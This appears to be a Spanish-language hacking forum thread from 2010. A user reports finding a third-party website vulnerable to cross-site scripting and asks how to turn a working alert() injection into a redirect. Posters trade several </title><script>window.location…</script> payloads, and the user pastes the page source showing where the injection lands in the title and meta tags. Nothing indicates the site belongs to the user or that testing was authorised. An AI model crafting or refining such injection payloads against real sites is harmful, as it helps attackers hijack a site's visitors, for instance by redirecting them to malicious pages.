hola! les cuento, encontré una web vulnerable a xss, intenté de varias formas pero ninguna funcionó, Pero Sí con ésta:
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
muestra el alert.
ahora, quiziera redireccionar la página a otro lugar, cómo podría hacerlo?
intenté con </TITLE><SCRIPT>window.location = "http://www.url.com";</SCRIPT> pero no va
Disculpas por la ignorancia, y gracias por la ayuda!
Simon así es,
</title><script>window.location = "http://www.mozilla.com/es-MX/";</script>
Cita de: Shell Root en 31 Octubre 2010, 16:53 PM
Simon así es,
</title><script>window.location = "http://www.mozilla.com/es-MX/";</script>
Eso es lo que dije que ya probé, y no funcionó :/
Revisa el código que le queda a la página después de su ejecución, a ver dónde está el fallo :P
El código queda así:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></TITLE><SCRIPT>alert("XSS");</SCRIPT></title><meta content="</TITLE><SCRIPT>alert("XSS");</SCRIPT>" property="og:title"/><meta name="description" content="</TITLE><SCRIPT>alert("XSS");</SCRIPT>"
Prueba:
</title>"><script>window.location.href='http://www.mozilla.com/es-MX/';</script>
no funcionó